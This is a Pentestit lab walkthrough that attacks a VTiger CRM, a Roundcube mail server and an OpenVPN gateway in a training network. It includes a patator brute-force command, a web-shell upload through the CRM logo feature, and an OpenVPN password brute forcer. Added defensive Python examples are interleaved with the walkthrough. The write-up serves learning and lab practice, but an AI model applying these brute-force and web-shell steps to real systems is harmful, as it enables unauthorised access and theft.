Innogen security


Pentestit lab v11 Guide Part 3

VTIGER CRM – 192.168.101.10:88

Upon loading the VTiger CRM webpage we are presented with a login box which, fortunately for us, shows the version of the CRM software running the site:

Testing the login via Firefox and copying the POST request out of Developer Tools => Network as a curl command, then splitting each parameter onto its own line for readability, we quickly see four interesting parameters:

  • PHP session id in the cookie value
  • __vtrftk:sid, which appears to be a CSRF token
  • username parameter
  • password parameter

NOTE: the default credentials listed here:
https://wiki.vtiger.com/index.php/Installation_with_Source
are admin:admin; these did not work, however the default username is still useful….

Based on this we can use a brute forcer to attempt logins against the CRM page; after some research patator appears to be a good fit for this.

NOTE: patator is built into Kali, and my instance was running v0.6, which caused a number of issues; updating to v0.7 cured those issues and allowed me to successfully execute a brute-force attack against the CRM.

Store the Params:

As we now have our session id and a CSRF token we can store these as environment variables in Kali:

Execute Patator v0.7:

Not being an expert with patator, this took me some time to get right and I sought advice from people around me who did have knowledge of patator in order to get the working command below, including a good example here:
https://blog.g0tmi1k.com/dvwa/bruteforce-high/
Another very useful link for patator modules:
https://en.kali.tools/?p=147


patator.py http_fuzz url="http://192.168.101.10:88/index.php?module=Users&action=Login" \
    method=POST body="__vtrftk=sid:${CSRF}&username=admin&password=FILE0" \
    0=/usr/share/wordlists/rockyou.txt follow=1 accept_cookie=0 header="Cookie: ${SESSID}" \
    before_urls="http://192.168.101.10:88/index.php" before_header="Cookie: ${SESSID}" \
    -x ignore:egrep="Invalid username or password"

NB: After some post-exploitation testing I am confident the CSRF token is not enforced.

Leaving this running, a password result was returned after around 20 minutes:

17:08:56 patator    INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2017-07-26 17:08 BST
17:09:05 patator    INFO -                                                                              
17:09:05 patator    INFO - code size:clen       time | candidate                          |   num | mesg
17:09:05 patator    INFO - -----------------------------------------------------------------------------
17:09:08 patator    INFO - 200  43206:-1       1.985 | SPOILER_REMOVED!                          |     1 | HTTP/1.1 200 OK
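As an added defender-side example (not code from the post or from patator), the pattern a run like the one above leaves in the web server log can be flagged by rate: the snippet parses constructed Apache-style access-log lines for the VTiger login endpoint and alerts on source IPs that POST to it repeatedly within a short window. The log lines, source IPs, window and threshold are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample access-log lines for the VTiger login endpoint (made up for this
# example, not taken from the lab); the last POST has a different response size.
SAMPLE_LOG = """\
192.168.101.50 - - [26/Jul/2017:17:09:05 +0100] "POST /index.php?module=Users&action=Login HTTP/1.1" 200 1840
192.168.101.50 - - [26/Jul/2017:17:09:05 +0100] "POST /index.php?module=Users&action=Login HTTP/1.1" 200 1840
192.168.101.50 - - [26/Jul/2017:17:09:06 +0100] "POST /index.php?module=Users&action=Login HTTP/1.1" 200 1840
192.168.101.50 - - [26/Jul/2017:17:09:07 +0100] "POST /index.php?module=Users&action=Login HTTP/1.1" 200 1840
192.168.101.50 - - [26/Jul/2017:17:09:08 +0100] "POST /index.php?module=Users&action=Login HTTP/1.1" 200 43206
192.168.101.77 - - [26/Jul/2017:17:09:10 +0100] "GET /index.php HTTP/1.1" 200 5120
192.168.101.77 - - [26/Jul/2017:17:09:30 +0100] "POST /index.php?module=Users&action=Login HTTP/1.1" 200 43206
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')
LOGIN_PATH = "/index.php?module=Users&action=Login"

def parse_line(line):
    """Return (ip, timestamp, method, path, status, size) or None for an unparsable line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, size = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path, int(status), (-1 if size == "-" else int(size))

def detect_login_bursts(log_text, window_s=60, threshold=5):
    """Flag IPs that POST to the login endpoint >= threshold times within window_s seconds.
    VTiger answers 200 for failed and successful logins alike, so the status code is useless;
    the attempt rate is the signal, and the distinct response sizes show a run of identical
    failure pages followed by a differently sized page (a probable successful login)."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs still inside the window
    sizes = defaultdict(set)      # ip -> distinct response sizes seen on login POSTs
    alerts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, when, method, path, _status, size = rec
        if method != "POST" or path != LOGIN_PATH:
            continue
        q = recent[ip]
        q.append(when)
        sizes[ip].add(size)
        while (when - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            alerts[ip] = {"attempts": len(q), "first": q[0], "last": q[-1],
                          "sizes": sorted(sizes[ip])}
    return alerts
```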

Once logged in we navigate to our user account preferences in order to gain information about the account we are currently logged in as:

From the preferences page we gain the following information:

  • Username: admin
  • Firstname: darthvader
  • Email: admin@test.lab

While looking for exploit routes, a searchsploit of the version turns up a single exploit for this version of VTiger CRM:


Exploiting VTiger CRM:

  • The exploit states: Vtiger CRM allows for the upload of a “company logo” from within the administrative interface.
  • The corresponding functionality can be accessed on the “CRM Settings” page (Settings -> CRM Settings -> Templates -> Company Details -> “Edit” button).
  • Initial tests showed that PHP tags were blocked, so a shell that base64 encodes/decodes its payload was used, found here: https://github.com/NSAKEY/Top-103-shells/blob/master/Top%20103%20shells/b374k-mini-shell-php.php.txt

Now that the tag issue is identified we can do the following in order to gain a web shell on the server:

  • Right clicking the company logo and viewing it in a new tab shows the folder path: http://192.168.101.10:88/test/logo/vtiger-crm-logo.png
  • Set up Burp Suite to intercept the traffic so that when we upload an image we can catch and manipulate the upload content data.
  • Select the Edit button as outlined above and upload a valid image.
  • Intercept the upload request in Burp Suite, replace the filename= path with the /test/logo path found during testing, and then replace the content data within the “CompanyDetailsSave” multipart tag with the encoded PHP shell:

[The screenshot above was from an earlier test, hence the filename difference.]

  • Once uploaded successfully we can navigate to our shell location and spawn a PHP shell:
    http://192.168.101.10:88/test/logo/sbshell.php
  • NOTE: It's worth sending the URL above to Repeater, as I lost the connection and subsequently the machine appears to reset regularly and we lose our shell.
  • On re-navigating around a new connection to the server we find the RCE_token.txt:

 

  • MySQL user found:

 
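The upload flow above works because the server trusts the client-supplied filename and screens the body with a tag blacklist. As an added example that is neither VTiger's code nor the post's, the weak check is shown beside a hardened one that ignores any directory in the filename, allowlists the extension, verifies the image header and refuses a PHP open tag anywhere in the body. The sample uploads, the blacklist behaviour and the LOGO_DIR path are assumptions.

```python
import posixpath
import re

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}
LOGO_DIR = "/var/www/html/test/logo"   # assumed on-disk location of the /test/logo folder

# Constructed uploads: a minimal PNG header, a script hidden behind a changed filename and a
# mixed-case tag, and a polyglot that keeps a valid PNG header but carries PHP after it.
GOOD_PNG = MAGIC["png"] + b"\x00" * 16
DISGUISED_SCRIPT = b"<?PHP echo 'not an image'; ?>"
POLYGLOT = MAGIC["png"] + b"<?php echo 'appended'; ?>"

def weak_check(filename, data):
    """Blacklist check modelled on the behaviour described above: only the literal '<?php'
    is refused, and the client-supplied filename (including any directory) is trusted."""
    return b"<?php" not in data

def hardened_check(filename, data):
    """Return (accepted, reason_or_storage_path) after allowlist and content checks."""
    name = posixpath.basename(filename.replace("\\", "/"))   # "../../test/logo/x.php" -> "x.php"
    if name.count(".") != 1:                                 # blocks "logo.php.png" double extensions
        return False, "exactly one extension required"
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match declared image type"
    if re.search(rb"<\?", data):                             # catches <?php, <?PHP and <?= in polyglots
        return False, "PHP open tag inside image data"
    return True, posixpath.join(LOGO_DIR, name)
```

The content checks do not by themselves make the logo folder safe: the post shows it is served and executed by the web server, so uploads should also land in a directory where PHP is not executed.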

Now that we have submitted our RCE token for the CRM system to our user control panel and gained our points, we can move forward and concentrate on the Roundcube mail server….

Roundcube MAIL – 192.168.101.10:8080

Based on the fact that our user (darthvader) is a Star Wars fan, I spent some time online and created a small Star Wars based wordlist: starwars_wordlist

As it turns out, the email address found in the CRM and the password for the username “darthvader” were the way into the Roundcube mail client.

Looking around the entire Roundcube client we see one mail containing an RSA key for the “Office 2” location with the username “tech”.

We can now connect to site 2 in the following manner (remember it's port 2222!):

ssh tech@192.168.101.11 -p 2222 -i ~/pentestitlabs/site2.key

Once in, we begin to enumerate the gateway and the network it belongs to in order to understand its function.

Gateway 101.11 ifconfig

The first check made was a basic ifconfig to see which networks this host belongs to, and the tun0 adapter immediately strengthens the suspicion that the two sites are cross-connected via a site-to-site VPN:


tech@tl11-gw-2:~$ /sbin/ifconfig 
eth0      Link encap:Ethernet  HWaddr 08:00:27:95:c0:42  
          inet addr:192.168.101.11  Bcast:192.168.101.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe95:c042/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:17506545 errors:0 dropped:0 overruns:0 frame:0
          TX packets:13990588 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:3391882723 (3.1 GiB)  TX bytes:7917471820 (7.3 GiB)

eth1      Link encap:Ethernet  HWaddr 08:00:27:d2:17:51  
          inet addr:192.168.13.254  Bcast:192.168.13.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fed2:1751/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:11495218 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17161079 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:5378508075 (5.0 GiB)  TX bytes:2823360693 (2.6 GiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1553444 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1553444 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:134362946 (128.1 MiB)  TX bytes:134362946 (128.1 MiB)

tun0      Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          inet addr:10.255.0.6  P-t-P:10.255.0.5  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1
          RX packets:30156 errors:0 dropped:0 overruns:0 frame:0
          TX packets:30167 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100 
          RX bytes:2533104 (2.4 MiB)  TX bytes:2533836 (2.4 MiB)

ps aux shows openvpn running with the server.conf profile:


root     29057  0.0  0.2  24940  5024 ?        Ss   Jul22   0:33 
/usr/sbin/openvpn --daemon ovpn-server --status /run/openvpn/server.status 10 
--cd /etc/openvpn --config /etc/openvpn/server.conf

OpenVPN server.conf

Output of cat on server.conf. As the CA certificate is included in the file, we export it locally as a cert for later use, along with the entire server.conf file:

tech@tl11-gw-2:~$ cat /etc/openvpn/server.conf
client
dev tun
proto tcp
remote 192.168.101.10 1194
remote-cert-tls server

#####
#ping 3
#ping-restart 60
#####

script-security 2

up	/etc/openvpn/update-resolv-conf
down	/etc/openvpn/update-resolv-conf

## auth for Office-2 user
auth-user-pass "/opt/openvpn/auth.txt"

resolv-retry infinite
persist-key
persist-tun
comp-lzo

<ca>
-----BEGIN CERTIFICATE-----
MIIEXjCCA0agAwIBAgIJAKYiQCcisQFFMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNV
BAYTAlJVMQ8wDQYDVQQIEwZNb3Njb3cxDzANBgNVBAcTBk1vc2NvdzERMA8GA1UE
ChMIQ29tYXBhbnkxCzAJBgNVBAsTAklUMRkwFwYDVQQDExBjb21wYW55LnRlc3Qu
TRUNCATED.....
hF1vr0KOCI6ODTwPEPJwAd9mcdRQK0Jd52WvuvdGQKUC8DPPDo4B2VHAn8KIDIJp
b+mecHvvxGTSzo4k5nz4bdpYit9i9HayvJ3uIjt05jciQkp5bi5YUXEpq0cspNLr
awoYzU/p/oTvFG8sn8EWAl6pPonQUCGka7GRG2Q9Na9QysMG8H5hITZ7d5VngyrJ
vwj14awsaPvMoIgk8C8Zrkuu
-----END CERTIFICATE-----
</ca>

log /var/log/openvpn-client.log
verb 3

 

Attacking the OpenVPN Password

The first thing to note is that the username was included in the server.conf as a comment:

## auth for Office-2 user

so we can use the Office-2 username and enumerate the password only. I tried crowbar, as this was returned as a top result in Google for brute forcing OpenVPN; however either my virtual machine or my usage was problematic and I could not get it to successfully find a password.

Based on this, and in an effort to learn, I decided to write my own brute forcer for OpenVPN, which did return a result within 5-10 minutes (I did not time it, apologies):

COMMAND:

python brute_openvpn.py --host 192.168.101.10 \
    --config /home/scripts/python/server.conf \
    --user Office-2 \
    --passlist /usr/share/john/password.lst

RESULTS:

[+] SUCCESS! command = /usr/sbin/openvpn --remote 192.168.101.10 \
    --config /home/scripts/python/server.conf \
    --auth-user-pass /tmp/sb_test/tmp4HdLuM
[+] Password: ***REMOVED***
[+] VPN Process stopped and temp files removed

I have uploaded this script to GitHub and it can be obtained here: Openvpn bruteforcer

With this in place we are now able to traverse into the Site 1 network; however we still have targets within the Site 2 location to enumerate and attack…..
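For the server.conf above and the password attack that followed, an added example (not from the post, the author's script or OpenVPN) that audits a client config for the weaknesses the lab exploited: a comment naming the account, a password kept on disk via auth-user-pass, and file permissions that let a low-privilege user such as tech read the config or the auth file. The sample config is constructed, the CA block is a placeholder, and the st_mode values passed in are assumptions.

```python
import re
import stat

# Constructed client config mirroring the directives in the server.conf above; the CA
# block is a placeholder and no real certificate or password is included.
SAMPLE_CONF = """\
client
dev tun
proto tcp
remote 192.168.101.10 1194
remote-cert-tls server
script-security 2
up /etc/openvpn/update-resolv-conf
## auth for Office-2 user
auth-user-pass "/opt/openvpn/auth.txt"
comp-lzo
<ca>
PLACEHOLDER_CA_PEM
</ca>
"""

def audit_openvpn_conf(text, conf_mode=None, auth_mode=None):
    """Return a list of findings for an OpenVPN config. conf_mode and auth_mode are st_mode
    values (e.g. os.stat(path).st_mode) of the config and of the auth-user-pass file; None
    means that permission check is skipped."""
    findings = []
    auth_file = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#"):
            if re.search(r"\b(user|account|login)\b", line, re.I):
                findings.append(f"comment hints at an account name: {line}")
            continue
        m = re.match(r'auth-user-pass\s+"?([^"\s]+)"?', line)
        if m:                                   # password material referenced from disk
            auth_file = m.group(1)
            findings.append(f"credentials stored on disk in {auth_file}")
        if line.startswith("script-security") and line.split()[-1] in ("2", "3"):
            findings.append("script-security permits external scripts; review up/down scripts")
        if line.startswith("comp-lzo") or line.startswith("compress"):
            findings.append("VPN compression enabled (deprecated; disable unless required)")
    if conf_mode is not None and conf_mode & stat.S_IROTH:
        findings.append("config file is world-readable")
    if auth_file and auth_mode is not None and auth_mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"{auth_file} is readable by group or others")
    return findings
```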

PART 4:
